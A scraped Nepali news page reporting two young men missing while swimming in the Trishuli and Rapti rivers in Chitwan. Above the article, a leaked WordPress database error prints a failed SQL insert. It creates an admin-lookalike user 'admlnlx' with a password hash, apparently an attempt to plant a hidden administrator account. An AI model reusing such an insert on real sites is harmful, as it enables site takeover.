WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2nQQerqlGelYke/.4iwjNFfiIBx7P1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 23:17:49', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
त्रिशुलीमा पौडी खेल्दा दुई युवा बेपत्ता – Gaule Khabar

त्रिशुलीमा पौडी खेल्दा दुई युवा बेपत्ता

त्रिशुलीमा पौडी खेल्दा दुई युवा बेपत्ता

चितवन,पुस १०-

त्रिशूली नदीमा पौडी खेल्ने क्रममा कालिका नगरपालिका–४ बस्ने १९ वर्षीय इमान लामा नदीमा बेपत्ता भएका छन् ।

चितवन प्रहरीका अनुसार कविलास–१ स्थित जुगेडीमा त्रिशूली नदीमा पौडी खेल्दा बेपत्ता उनको खोजी भइरहेको प्रहरीले जनाएको छ । त्यस्तै, खैरहनी नगरपालिका–१६ स्थित राप्ती नदीमा पौडी खेल्ने क्रममा स्थानीय १८ वर्षका प्रविन रोइला बेपत्ता भएको प्रहरीले जनाएको छ । उनको पनि खोजी भइरहेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका